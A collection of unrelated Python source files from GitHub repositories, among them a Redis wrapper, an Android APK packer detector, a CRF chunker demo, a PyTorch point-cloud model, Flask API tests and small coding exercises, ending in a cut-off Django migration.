Dawitworku/Python-stack | 10,024,453,679,351 | 5df4894875d219eb9593c280bf246e627fc8f99f | f0520714c2a49bd89c131446d947677fe5a5df5f | /_python/OOP/MathDojo/Math_Dojo.py | cb0d82595b3e6c60f02aa0ae34df048d034c3ab4 | [] | no_license | https://github.com/Dawitworku/Python-stack | 38c12f70279c3c913f5eefd47b9954939de2690b | 198645fa4eef948895be238828b2ce998a37ed03 | refs/heads/master | "2023-01-08T13:59:54.712454" | "2020-11-06T02:24:39" | "2020-11-06T02:24:39" | 292,392,381 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class MathDojo:
def __init__(self):
self.result = 0
def add(self, num, *nums):
splat = 0
for i in nums:
splat += i
self.result += num + splat
return self
def subtract(self, num, *nums):
splatvar = 0
for i in nums:
splatvar -= i
self.result -= (num - splatvar)
return self
# create an instance:
md = MathDojo()
# x = md.add(2).add(2,5,1).subtract(3,2).result
x = md.add(2).result
print(x)
y = md.add(150).add(100,55,45).subtract(30,200).result
print(y)
z = md.add(5).add(5,5,5).subtract(5,5).result
print(z)
# x = md.add(2)
# y = md.add(2,5,1)
# z = md.subtract(3,2,5)
| UTF-8 | Python | false | false | 696 | py | 104 | Math_Dojo.py | 60 | 0.525862 | 0.471264 | 0 | 40 | 16.325 | 54 |
jaw566/RosConnect | 7,834,020,349,065 | b1bbab597b30ad31fbd8e1fa64e4cfda7e37aabc | 6d9a30a1eb771057aa95b882fffe40a6aadf0264 | /App/init_desktop_file.py | 6f48dedde331857a9cbaee86fea8a379afe81b6b | [] | no_license | https://github.com/jaw566/RosConnect | 28c1fa76c6aa97ca585bbd2e0da3d0bdb747a332 | 50a5a803c4c3db2435b5a7926066dfb25228a9ff | refs/heads/master | "2022-06-19T06:55:47.175624" | "2020-05-07T05:14:43" | "2020-05-07T05:14:43" | 210,413,435 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
import os
def main():
HOME = os.environ['HOME']
with open(HOME+'/Desktop/RosConnect.desktop','r') as file:
data = file.readlines()
data[4] = "Icon="+HOME+"/logo.png\n"
with open(HOME+'/Desktop/RosConnect.desktop','w') as file:
file.writelines(data)
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 359 | py | 35 | init_desktop_file.py | 27 | 0.568245 | 0.562674 | 0 | 19 | 17.631579 | 62 |
DarkLii/Hogwarts-16 | 10,136,122,855,984 | 59a31af389448e0849fd529dc3d0a3f4a2e60408 | b9f6d0c29da869e844ae88132aecd9d10072241b | /pytest_allure/data_base/redis/redis_op.py | 81c96b9dfaf081710b2300621787f8b6dadc73e7 | [] | no_license | https://github.com/DarkLii/Hogwarts-16 | 63b10ff3ace397b7b95731d2882bfb97f6e537c9 | d0de06281afad023b1bc94221c8117bf111c9479 | refs/heads/master | "2023-04-03T07:52:00.551910" | "2021-04-10T14:01:36" | "2021-04-10T14:01:36" | 319,946,774 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding:utf-8 -*-
# @Author: DarkLi
# @Time : 2020/8/28
# @Desc : redis 操作封装
import json
from redis import StrictRedis, ConnectionPool
from pytest_allure.utiles.decorator import log_wrapper
class RedisOp:
def __init__(self, obj, data_base_config):
# if hasattr(obj, "Log") and obj.Log.get("output_console", True):
# self.log = Logger(level="info")
# else:
# self.log = None
self.log = obj.log if hasattr(obj, "log") else None
self.host = data_base_config["host"]
self.port = data_base_config["port"]
self.user = data_base_config["user"]
self.password = data_base_config["password"]
self.db = data_base_config["database"]
self.charset = data_base_config.get("charset", "UTF-8")
self.decode_responses = data_base_config.get("decode_responses", True)
self.pool = ConnectionPool(host=self.host, port=self.port, password=self.password, db=self.db,
decode_responses=self.decode_responses)
# 获取连接
self.connection = StrictRedis(connection_pool=self.pool)
def close(self):
# 关闭连接池所有连接,PS:慎用
self.connection.connection_pool.disconnect()
"""
string 类型 redis 操作:{"key": "value"}
"""
@log_wrapper
def set(self, key, value, time=None):
"""
单条插入 key_value
:param key:
:param value:
:param time: 单位为秒
:return:
"""
if isinstance(value, dict):
value = json.dumps(value, ensure_ascii=False)
if time:
ret = self.connection.setex(key, time, value)
else:
ret = self.connection.set(key, value)
return ret
@log_wrapper
def setnx(self, key, value):
"""
key 不存在时 插入数据
:param key:
:param value:
:return:
"""
return self.connection.setnx(key, value)
@log_wrapper
def psetex(self, name, time_ms, value):
"""
插入含过期时间的 key_value
:param name:
:param time_ms: 单位为毫秒
:param value:
:return:
"""
return self.connection.psetex(name, time_ms, value)
@log_wrapper
def mset(self, key_value_dict):
"""
批量插入 key_value
:param key_value_dict:
:return:
"""
for key, value in key_value_dict.items():
if isinstance(value, dict):
key_value_dict[key] = json.dumps(value, ensure_ascii=False)
return self.connection.mset(key_value_dict)
@log_wrapper
def msetnx(self, key_value_dict):
"""
key 均不存在时才插入
:param key_value_dict:
:return:
"""
return self.connection.msetnx(key_value_dict)
@log_wrapper
def get(self, key):
"""
获取 key 的 value
:param key:
:return:
"""
return self.connection.get(key)
@log_wrapper
def mget(self, key_list):
"""
回多个 key 对应的 value
:param key_list: 格式为 列表
:return:
"""
return self.connection.mget(key_list)
@log_wrapper
def getset(self, key):
"""
给数据库中 key 赋予值 value 并返回上次的 value
:param key:
:return:
"""
return self.connection.getset(key)
@log_wrapper
def keys(self, key):
"""
获取所有符合规则的 key
:param key: eg: "n*"
:return:
"""
return self.connection.keys(key)
"""
redis key 操作
"""
@log_wrapper
def exists(self, key):
"""
判断 key 是否存在
:param key:
:return:
"""
return self.connection.exists(key)
@log_wrapper
def expire(self, key, time):
"""
设定key的过期时间,单位秒
:param key:
:param time: 单位秒
:return:
"""
return self.connection.expire(key, time)
@log_wrapper
def delete(self, key):
"""
删除一个 key
:param key:
:return:
"""
return self.connection.delete(key)
@log_wrapper
def mdelete(self, key_list):
"""
删除多个指定的 key
:param key_list:
:return:
"""
for key in key_list:
self.connection.delete(key)
"""
hash 类型 redis 操作:{"name":{"key": "value"}}
"""
# TODO hash 类型 redis 操作
"""
list 类型 redis 操作:{"key": []}
"""
# TODO list 类型 redis 操作
if __name__ == '__main__':
data_base_config = {
"host": "172.16.11.127",
"port": 6379,
"database": 13,
"user": "root",
"password": "standalone_passwd_test",
}
data_base = RedisOp(data_base_config)
test_key = "test_key"
test_value = "test_value"
data_base.set(test_key, test_value)
data_base.get(test_key)
key_value_dict = {
"mset_key_1": {"mset_key_111": "mset_value_111"},
"mset_key_2": {"mset_key_222": "mset_value_222"},
}
data_base.mset(key_value_dict)
key_list = [test_key, "mset_key_1", "mset_key_2"]
data_base.mdelete(key_list)
| UTF-8 | Python | false | false | 5,406 | py | 47 | redis_op.py | 42 | 0.524333 | 0.516287 | 0 | 217 | 22.483871 | 102 |
wyu0hop/check_APPPacker | 9,199,819,983,928 | 2e697d3db308ab8049ea2f4157a6a94acae88db5 | 1d917be085435f66658b86cf9b9b285ecb0a1e56 | /check_APPPacker.py | 2b27a5ab4991963a9e9c404f71a98a86ab0648e9 | [] | no_license | https://github.com/wyu0hop/check_APPPacker | 0c37dfcf02ad36f6a394de351f9b35e00b8096bd | 16d25c0d49d600f16d4e7ddb32a4d02095d51c92 | refs/heads/master | "2022-03-27T14:08:34.663686" | "2019-12-03T06:04:54" | "2019-12-03T06:04:54" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import zipfile
import sys
#@Time :2019.12.3
#@Author :zengxin
packer_dict={
"libchaosvmp.so":"使用了娜迦进行加固",
"libddog.so":"使用了娜迦进行加固",
"libfdog.so":"使用了娜迦进行加固",
"libedog.so":"使用了娜迦企业版进行加固",
"libexec.so":"使用了爱加密加固(可能性大)或腾讯进行加固",
"libexecmain.so":"使用了爱加密进行加固",
"ijiami.dat":"使用了爱加密进行加固",
"ijiami.ajm":"使用了爱加密企业版进行加固",
"af.bin":"使用了爱加密进行加固",
"signed.bin":"使用了爱加密进行加固",
"libsecexe.so":"使用了梆梆免费版进行加固",
"libsecmain.so":"使用了梆梆免费版进行加固",
"libSecShell.so":"使用了梆梆免费版进行加固",
"secData0.jar":"使用了梆梆免费版进行加固",
"libSecShell-x86.so":"使用了梆梆免费版进行加固",
"libDexHelper.so":"使用了梆梆企业版进行加固",
"libDexHelper-x86.so":"使用了梆梆企业版进行加固",
"classes.jar":"使用了梆梆定制版进行加固",
"DexHelper.so":"使用了梆梆定制版进行加固",
"libprotectClass.so":"使用了360进行加固",
# ".appkey":"使用了360进行加固",
"libjiagu.so":"使用了360进行加固",
"libjiagu_art.so":"使用了360进行加固",
"libjiagu_x86.so":"使用了360进行加固",
"libcmvmp.so":"使用了中国移动安全进行加固",
"libmogosec_dex.so":"使用了中国移动安全进行加固",
"libmogosec_sodecrypt.so":"使用了中国移动安全进行加固",
"libmogosecurity.so":"使用了中国移动安全进行加固",
"mogosec_classes":"使用了中国移动安全进行加固",
"mogosec_data":"使用了中国移动安全进行加固",
"mogosec_dexinfo":"使用了中国移动安全进行加固",
"mogosec_march":"使用了中国移动安全进行加固",
"libegis.so":"使用了通付盾进行加固",
"libNSaferOnly.so":"使用了通付盾进行加固",
"libreincp.so":"使用了珊瑚灵御进行加固",
"libreincp_x86.so":"使用了珊瑚灵御进行加固",
"libnqshield.so":"使用了网秦进行加固",
"libbaiduprotect.so":"使用了百度进行加固",
"baiduprotect1.jar":"使用了百度进行加固",
"baiduprotect.jar":"使用了百度进行加固",
"libuusafe.jar.so":"使用了UU安全进行加固",
"libuusafe.so":"使用了UU安全进行加固",
"libuusafeempty.so":"使用了UU安全进行加固",
"dp.arm-v7.so.dat":"使用了DexProtect进行加固",
"dp.arm.so.dat":"使用了DexProtect进行加固",
"aliprotect.dat":"使用了阿里聚安全进行加固",
"libsgmain.so":"使用了阿里聚安全进行加固",
"libsgsecuritybody.so":"使用了阿里聚安全进行加固",
"libmobisec.so":"使用了阿里聚安全进行加固",
"libfakejni.so":"使用了阿里聚安全进行加固",
"libzuma.so":"使用了阿里聚安全进行加固",
"libzumadata.so":"使用了阿里聚安全进行加固",
"libpreverify1.so":"使用了阿里聚安全进行加固",
"classes.dex.dat":"使用了dexprotect进行加固",
"dp.arm-v7.so.dat":"使用了dexprotect进行加固",
"dp.arm.so.dat":"使用了dexprotect进行加固",
"libtup.so":"使用了腾讯进行加固",
"libshell.so":"使用了腾讯进行加固",
"tencent_stub":"使用了腾讯进行加固",
"mix.dex":"使用了腾讯进行加固",
"libshella":"使用了腾讯进行加固",
"libshellx":"使用了腾讯进行加固",
"libshella-xxxx.so":"使用了腾讯进行加固",
"libshellx-xxxx.so":"使用了腾讯进行加固",
"mix.dex":"使用了腾讯进行加固",
"mixz.dex":"使用了腾讯进行加固",
"libtosprotection.armeabi.so":"使用了腾讯御安全进行加固",
"libtosprotection.armeabi-v7a.so":"使用了腾讯御安全进行加固",
"libtosprotection.x86.so":"使用了腾讯御安全进行加固",
"libtest.so":"使用了腾讯御安全进行加固",
"tosversion":"使用了腾讯御安全进行加固",
"libTmsdk":"使用了腾讯御安全进行加固",
"libTmsdk-xxx-mfr.so":"使用了腾讯御安全进行加固",
"libnesec.so":"使用了网易易盾进行加固",
"libAPKProtect.so":"使用了APKProtect进行加固",
"libkwscmm.so":"使用了几维安全进行加固",
"libkwscr.so":"使用了几维安全进行加固",
"libkwslinker.so":"使用了几维安全进行加固",
"kdpdata.so":"使用了几维安全进行加固",
"dex.dat":"使用了几维安全进行加固",
"libkdp.so":"使用了几维安全进行加固",
"libx3g.so":"使用了顶像科技进行加固",
"libapssec.so":"使用了盛大进行加固",
"librsprotect.so":"使用了瑞星进行加固",
"libitsec.so":"使用了海云安进行加固",
"itse":"使用了海云安进行加固",
"libapktoolplus_jiagu.so":"使用了apktoolplus进行加固",
"jiagu_data.bin":"使用了apktoolplus进行加固",
"sign.bin":"使用了apktoolplus进行加固"
}
def packerDetector(apkpath):
packertype="未进行加固或未匹配到该特征库"
packersign=""
zipfiles=zipfile.ZipFile(apkpath)
nameList=zipfiles.namelist()
for fileName in nameList:
for packer in packer_dict.keys():
if packer in fileName:
packertype=packer_dict[packer]
packersign=packer
print("经检测,该apk"+packertype)
def main():
if len(sys.argv)==2:
packerDetector(sys.argv[1])
else:
print("请输入正确的apk包名")
print("eg:python3 check_APPPacker.py whm_2019.apk")
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 5,453 | py | 2 | check_APPPacker.py | 1 | 0.710786 | 0.697832 | 0 | 119 | 28.840336 | 59 |
retresco/pcrf | 9,603,546,900,695 | ef1f88edce6806df32090cc4dae6ea35b065eb27 | 185380ede44d0227563d2a5d8aff26228ec0b5ff | /python-wrapper/pcrf-apply-demo.py | 30920937a0f592de90ca6ec5bce53f8c4da8bfa6 | [
"MIT"
] | permissive | https://github.com/retresco/pcrf | b4086b66aba88c704530e82e9a49a202514875a5 | 329982ade6a5a785d5fc7b76933557aed81d2206 | refs/heads/master | "2021-01-10T05:09:29.491082" | "2016-02-16T16:48:21" | "2016-02-16T16:48:21" | 36,813,622 | 3 | 3 | null | false | "2015-07-30T09:18:26" | "2015-06-03T15:43:18" | "2015-06-13T12:10:43" | "2015-07-30T07:43:35" | 348 | 2 | 3 | 0 | C++ | null | null | import pcrf_python
import json
# Load config file
config = pcrf_python.CRFConfiguration("../demo/chunk.cfg")
config.set_running_text_input(True)
# Load model
model = pcrf_python.SimpleLinearCRFFirstOrderModel("../demo/chunker.model")
# Construct applier on the basis of the CRF model and the configuration
crf_applier = pcrf_python.FirstOrderLCRFApplier(model,config)
# Set the output mode to "tab-separated" (the other possibility is "json",
# but this currently works only for NER tasks)
crf_applier.set_output_mode("tsv")
# Apply to input string
utf8_string = "Merkel and Obama met at the G7 summit at Schloss Elmau near Garmisch-Partenkirchen."
out_string = crf_applier.apply_to(utf8_string)
print('\nResults')
print out_string
# Apply to file
out_string = crf_applier.apply_to_text_file("cl-final.txt")
print('\nResults')
print out_string
| UTF-8 | Python | false | false | 852 | py | 45 | pcrf-apply-demo.py | 33 | 0.765258 | 0.761737 | 0 | 27 | 30.481481 | 99 |
temirxan011/balton | 14,585,708,976,271 | 45b6415a443fd2292b54d1a05579d951725ec25d | 6222dc42f191f2417eb89dbe4fb3470928aba875 | /Iearn_dict.py | 3ac1d90fa5c3ee04d02c875cbdfda68c551569ac | [] | no_license | https://github.com/temirxan011/balton | 1a9c3133af1ec0f069d49d825fa2dc813539b0b3 | 97a5e18f11f9c2e8555b6e15e34752252abdf44a | refs/heads/main | "2023-08-11T12:54:47.975893" | "2021-10-11T05:49:43" | "2021-10-11T05:49:43" | 415,652,568 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
def learn_dict():
os.system('CLS')
statistics_right = statistics_wrong = 0 # переменные для введения статистики
# вывод всех словарей
dict_list = os.listdir(path='./dict')
print('\nСПИСОК ДОСТУПНЫХ СЛОВАРЕЙ')
for i in dict_list:
print('| ' + i, end=' ')
# запись данных из файла в список
name_dict = input('\nВведите название словаря: ')
with open('./dict/' + name_dict + '.txt', 'r') as f:
dict = f.read().split("|")
# процесс обучения и проверки правильности перевода
print('\n----------|' + name_dict + '|-----------')
for i in range(0, (len(dict)//2) + 2, 2):
print(dict[i])
str_translite = input('Перевод: ')
if str_translite == dict[i + 1]:
print('ПРАВИЛЬНО' + '\n-----------------------------')
statistics_right += 1
else:
print('ОШИБКА,' + ' ПРАВИЛЬНЫЙ ОТВЕТ: ' + dict[i+1] + '\n-----------------------------')
statistics_wrong += 1
print('--------|' + 'СТАТИСТИКА' + '|---------' + '\nПРАВИЛЬНО: ', statistics_right, ' | НЕПРАВИЛЬНО: ', statistics_wrong) | UTF-8 | Python | false | false | 1,357 | py | 4 | Iearn_dict.py | 3 | 0.509317 | 0.501331 | 0 | 29 | 37.896552 | 127 |
frolkin28/alg_lab2 | 4,999,341,938,638 | ebb601483af7334391597cea372f39559d431e6e | 502edb2d07a4c8ab43623819518a47e0b8c9d352 | /alg2.py | d4a10a22ab6fc08e40f267d3597f2b691ecaf7a0 | [] | no_license | https://github.com/frolkin28/alg_lab2 | cc9d470d22c3449063499937eaa67bc41110333a | 1f9faa210826045f04090acf3dd520641002a9ab | refs/heads/master | "2021-01-05T21:48:12.877709" | "2020-02-18T19:15:45" | "2020-02-18T19:15:45" | 241,146,368 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | def selection_sort(array):
i, size = 0, len(array)
comps, swaps = 0, 0
while i < size:
min_i, j = i, i + 1
while j < size:
comps += 1
if array[j] < array[min_i]:
min_i = j
j += 1
swaps += 1
array[i], array[min_i] = array[min_i], array[i]
i += 1
return array, comps, swaps
def merge(array, l, m, r):
comps, swaps = 0, 0
l_copy = array[l:m + 1]
r_copy = array[m + 1:r + 1]
l_copy_index = 0
r_copy_index = 0
sorted_index = l
while l_copy_index < len(l_copy) and r_copy_index < len(r_copy):
comps += 1
if l_copy[l_copy_index] <= r_copy[r_copy_index]:
array[sorted_index] = l_copy[l_copy_index]
l_copy_index += 1
swaps += 1
else:
array[sorted_index] = r_copy[r_copy_index]
r_copy_index += 1
swaps += 1
sorted_index += 1
while l_copy_index < len(l_copy):
swaps += 1
array[sorted_index] = l_copy[l_copy_index]
l_copy_index = l_copy_index + 1
sorted_index += 1
while r_copy_index < len(r_copy):
swaps += 1
array[sorted_index] = r_copy[r_copy_index]
r_copy_index += 1
sorted_index += 1
return comps, swaps
comps, swaps = 0, 0
def merge_sort(array, left, right):
global comps, swaps
if left < right:
m = (left + right) // 2
merge_sort(array, left, m)
merge_sort(array, m + 1, right)
temp_comps, temp_swaps = merge(array, left, m, right)
print(array)
comps += temp_comps
swaps += temp_swaps
return array, comps, swaps
| UTF-8 | Python | false | false | 1,702 | py | 4 | alg2.py | 2 | 0.500588 | 0.482374 | 0 | 66 | 24.787879 | 68 |
uservipin/python | 11,012,296,159,913 | b35ddf463357dbae37de88ee00b8184fe6bf71de | 8370a2408372fd7b828a58cac149e690bd409308 | /Classe_modules_practise/Create_Time_class.py | 2c89816f311b900506aa04343789a5b3d0d7c8e1 | [] | no_license | https://github.com/uservipin/python | a0f7176817cfabbc75d7f4999efd6d4667455c19 | 6f7e99038e262558c395ccbdbbb26175bf55e8b7 | refs/heads/main | "2023-01-06T21:12:49.604069" | "2022-12-28T18:02:42" | "2022-12-28T18:02:42" | 93,314,161 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Create a Time class and initialize it with hours and minutes.
# 1. Make a method addTime which should take two time object and add them.
# E.g.- # (2 hour and 50 min)+(1 hr and 20 min) is (4 hr and 10 min)
# 2. Make a method displayTime which should print the time.
# 3. Make a method DisplayMinute which should display the total minutes in the Time.
# E.g.- (1 hr 2 min) should display 62 minute.
class Time:
def __init__(self,hours,minutes):
self.hours= hours
self.minutes= minutes
self.total_minute =0
self.minutes_and_hour=0
# print(self.hours)
# print(self.minutes)
def addTime(time_1,time_2):
#print('Both times are: ',time_1,time_2)
# print('Minutes are :',time_1.minutes)
# print('Minutes_if hours are :', time_1.hours*60)
# print('Minutes are :', time_2.minutes)
# print('Minutes_if hours are :', time_2.hours * 60)
total_minute = time_1.minutes +time_1.hours*60 +time_2.minutes+time_2.hours * 60
#print('total Minutes are : ',total_minutes)
minutes_and_hour = [total_minute//60,total_minute%60]
# return minutes_and_hour[0], minutes_and_hour[1]
def total_minutes(self):
return self.total_minute
def minutes_and_hours(self):
return self.minutes_and_hour
t1 = Time(3,40)
t2 = Time(4,50)
t3 =Time.addTime(t1,t2)
| UTF-8 | Python | false | false | 1,467 | py | 90 | Create_Time_class.py | 34 | 0.596455 | 0.558964 | 0 | 37 | 38.540541 | 92 |
ywcmaike/pcdnet | 6,597,069,794,803 | 747f50b319131a8463585fd26de4efac48e97337 | 7c9b4c05573c197b2b28748ecdde76d27cf62c03 | /model/point_model.py | d726a1ad9eff515ac85262ad58aeb6b314855abe | [] | no_license | https://github.com/ywcmaike/pcdnet | c196f45bbd0a79385c6743bf06411743d2d9a9d7 | 04330bec176cf2ea594542bb6005559bc8f77a7d | refs/heads/master | "2022-03-23T01:16:20.385042" | "2020-01-05T13:34:37" | "2020-01-05T13:34:37" | 231,919,582 | 9 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from .layer.project import GraphProject, GraphProjectU
def maxpool(x, dim=-1, keepdim=False):
out, _ = x.max(dim=dim, keepdim=keepdim)
return out
class ResnetBlockFC(nn.Module):
def __init__(self, size_in, size_out=None, size_h=None):
super().__init__()
# Attributes
if size_out is None:
size_out = size_in
if size_h is None:
size_h = min(size_in, size_out)
self.size_in = size_in
self.size_h = size_h
self.size_out = size_out
# Submodules
self.fc_0 = nn.Linear(size_in, size_h)
self.fc_1 = nn.Linear(size_h, size_out)
self.actvn = nn.ReLU()
if size_in == size_out:
self.shortcut = None
else:
self.shortcut = nn.Linear(size_in, size_out, bias=False)
# Initialization
nn.init.zeros_(self.fc_1.weight)
def forward(self, x):
net = self.fc_0(self.actvn(x))
dx = self.fc_1(self.actvn(net))
if self.shortcut is not None:
x_s = self.shortcut(x)
else:
x_s = x
return x_s + dx
class ResnetPointnet(nn.Module):
def __init__(self, input_dim=128, output_dim=3, hidden_dim=128):
super().__init__()
self.fc_pos = nn.Linear(input_dim, 2*hidden_dim)
self.block_0 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.block_1 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.block_2 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.block_3 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.block_4 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.fc_c = nn.Linear(hidden_dim, output_dim)
self.actvn = nn.ReLU()
self.pool = maxpool
def forward(self, p):
batch_size, T, D = p.size()
# output size: B x T X F
net = self.fc_pos(p)
net = self.block_0(net)
pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())
net = torch.cat([net, pooled], dim=2)
net = self.block_1(net)
pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())
net = torch.cat([net, pooled], dim=2)
net = self.block_2(net)
pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())
net = torch.cat([net, pooled], dim=2)
net = self.block_3(net)
pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())
net = torch.cat([net, pooled], dim=2)
net = self.block_4(net)
c = self.fc_c(self.actvn(net))
return c
class ResPointNet(nn.Module):
def __init__(self, input_channel, param, output_channel=3):
super(ResPointNet, self).__init__()
self.param = param
self.project = GraphProjectU(param.use_z_weight)
self.respoint = ResnetPointnet(input_channel)
def forward(self, img_feats, points, proj_mat):
B = img_feats.shape[0]
x = self.project(points, img_feats, proj_mat)
output_points = self.respoint(x)
return output_points + points | UTF-8 | Python | false | false | 3,132 | py | 22 | point_model.py | 18 | 0.57567 | 0.563218 | 0 | 102 | 29.715686 | 71 |
sohaibullah4d/Practice-Problems | 4,028,679,325,922 | 56609fe16f6286f077669192ef501f1bdc96c4ed | 68601a11f81f414bada398cc38fac197326babc6 | /3.2(a).py | 5b29f42805c266180beb94e13cbd0b19e0753e4a | [] | no_license | https://github.com/sohaibullah4d/Practice-Problems | cffec945e08d4baa93a454a0aab90aee13144f72 | 7ba4dd30b1381bbbd2969efe3205bd48bfc55d56 | refs/heads/master | "2020-04-07T15:55:56.243411" | "2018-11-21T07:37:28" | "2018-11-21T07:37:28" | 158,507,677 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | print("MUHAMMAD SOHAIB - 18B-054-CS - section A")
print("\t\t\t PRACTICE PROBLEM 3.2(a)")
age = int(input("Enter ypur age:"))
if age > 62:
print("You can get your pension benefits")
else:
print("Sorry")
| UTF-8 | Python | false | false | 222 | py | 15 | 3.2(a).py | 15 | 0.621622 | 0.581081 | 0 | 9 | 22.666667 | 49 |
acarter881/exercismExercises | 2,078,764,194,163 | 528cc46052df112413b0774f8a7a721d45d72d11 | df2c7670a30d24cb53a0e3e4177f3cdfd381a5a0 | /acronym/acronym.py | 19bae512e68a6d518f4a0d925be055d315920aaa | [] | no_license | https://github.com/acarter881/exercismExercises | d25a40de570db47edb95334c4c324f0707bedf50 | 3fe82d93ed89316630fe1819f60b075fc77f327e | refs/heads/main | "2023-07-26T02:21:22.701555" | "2021-09-05T21:32:22" | "2021-09-05T21:32:22" | 376,628,449 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import re
acroRegEx = re.compile("([A-Za-z])[A-Za-z']*")
def abbreviate(words):
return ''.join(re.findall(acroRegEx, words)).upper()
print(abbreviate('Complementary metal-oxide semiconductor')) | UTF-8 | Python | false | false | 200 | py | 59 | acronym.py | 55 | 0.705 | 0.705 | 0 | 8 | 24.125 | 60 |
zhangpeng0v0/Python_learning_notes | 1,924,145,385,275 | 1ea9de413d6b05732fd981de8c56f58003aa8c2b | 05ad79e3698bb484a7c0272a15610d3da955a5f3 | /Python_learning_notes/code/函数/函数和过程.py | c8dea7185ae0f5391559a20b193c2610106e33b3 | [] | no_license | https://github.com/zhangpeng0v0/Python_learning_notes | 5bcd3292f5d770c8cc2e895433698a7aa372ef42 | 8f2dc18bb13a07ec92c489d28afd66da1186bea9 | refs/heads/master | "2022-01-22T18:29:44.391295" | "2019-06-13T05:59:59" | "2019-06-13T05:59:59" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # def fun():
# return None
#
# fun()
#
# def fun():
# print('hello world')
#
#
# print('hello world') | UTF-8 | Python | false | false | 109 | py | 73 | 函数和过程.py | 42 | 0.504587 | 0.504587 | 0 | 10 | 10 | 26 |
guru-aot/ccpractice | 326,417,557,314 | 2e29d40ab39f0f4dec0980ef5d7e45b33c03c3f7 | 371a10da1ed0c978cb285fbe303ae493d79da1a7 | /backend/tests/test_api.py | 9880f34d9036890de11405c4af73008a41b4a503 | [] | no_license | https://github.com/guru-aot/ccpractice | 634940a8abf2455fe18fb4a0d151bcf614210046 | cdcc98ce6550d80767f392dfbe83f946e1effa4d | refs/heads/main | "2023-03-30T16:53:21.428265" | "2021-03-26T03:59:52" | "2021-03-26T03:59:52" | 351,512,799 | 0 | 0 | null | true | "2021-03-25T16:59:36" | "2021-03-25T16:59:35" | "2021-03-24T22:05:49" | "2021-03-24T22:30:19" | 2,193 | 0 | 0 | 0 | null | false | false | import uuid
TEST_JWT_HEADER = {
"alg": "RS256",
"typ": "JWT",
"kid": "foiclientapp"
}
TEST_JWT_CLAIMS = {
"iss": "https://iam.aot-technologies.com/auth/realms/foirealm",
"sub": "3559e79c-7115-41c1-bb26-1a3dc54bbf5e",
"aud": ["foiclientapp"],
"firstname": "Test",
"lastname": "User",
"realm_access": {
"roles": [
"approver"
]
},
"preferred_username": "user"
}
def factory_auth_header(jwt, claims):
"""Produce JWT tokens for use in tests."""
return {'Authorization': 'Bearer ' + jwt.create_jwt(claims=claims, header=TEST_JWT_HEADER)}
REQUEST_OBJECT = {
'name': 'unit test1',
'description': 'Unit test the post request status',
'status': 'submitted',
'createdby': 'unittest user',
'updated': False,
'transactionid': str(uuid.uuid4())
}
def test_ping(app, client):
response = client.get('/')
assert response.status_code == 200
def test_secure(app, client, jwt):
headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
response = client.get('requests/test', headers=headers)
assert response.status_code == 200
# def test_ping_text(app, client, jwt):
# headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
# response = client.get('/ping', headers=headers)
# assert b'pong' in response.data
def test_get_requests(app, client, jwt):
headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
response = client.get('/requests/all', headers=headers)
assert response.status_code == 200
def test_get_requests_text(app, client, jwt):
headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
response = client.get('/requests/all', headers=headers)
assert b'test' in response.data
def test_post_requests(app, client, jwt):
headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
response = client.post('/requests/add', json=REQUEST_OBJECT, headers=headers)
assert response.status_code == 200
def test_post_requests_text(app, client, jwt):
headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
data = {'name': 'unit test2', 'description': 'Unit test the POST request text', 'status': 'submitted',
'createdby': 'unittest user', 'updated': False, 'transactionid': str(uuid.uuid4())}
response = client.post('/requests/add', json=data, headers=headers)
assert b'true' in response.data
def test_update_requests(app, client, jwt):
headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
data = {'name': 'unit test3', 'description': 'Unit test the PUT request text', 'status': 'submitted',
'createdby': 'unittest user', 'updated': False, 'transactionid': str(uuid.uuid4())}
response = client.put('/requests/10', json=data, headers=headers)
assert response.status_code == 200
# def test_delete_requests(app, client, jwt):
# headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
# response = client.delete('/requests/12', headers=headers)
# assert response.status_code == 200
| UTF-8 | Python | false | false | 3,074 | py | 77 | test_api.py | 49 | 0.660052 | 0.643461 | 0 | 93 | 32.053763 | 106 |
sbtries/class_pandaaaa | 17,351,667,878,018 | f5c3fd97d7f95c0e0d0d87fcee6ea08044227568 | aef69557d8960205a780e61b7c2dfbb1d7733449 | /Code/Theo/django/todo/todo_app/migrations/0002_alter_todoitem_completed_date.py | bf109484aae1281150831d0a101170f157275702 | [] | no_license | https://github.com/sbtries/class_pandaaaa | 579d6be89a511bdc36b0ce8c95545b9b704a734a | bbf9c419a00879118a55c2c19e5b46b08af806bc | refs/heads/master | "2023-07-18T14:18:25.881333" | "2021-09-02T22:48:29" | "2021-09-02T22:48:29" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.2.5 on 2021-07-29 21:18
from django.db import migrations, models
class Migration(migrations.Migration):
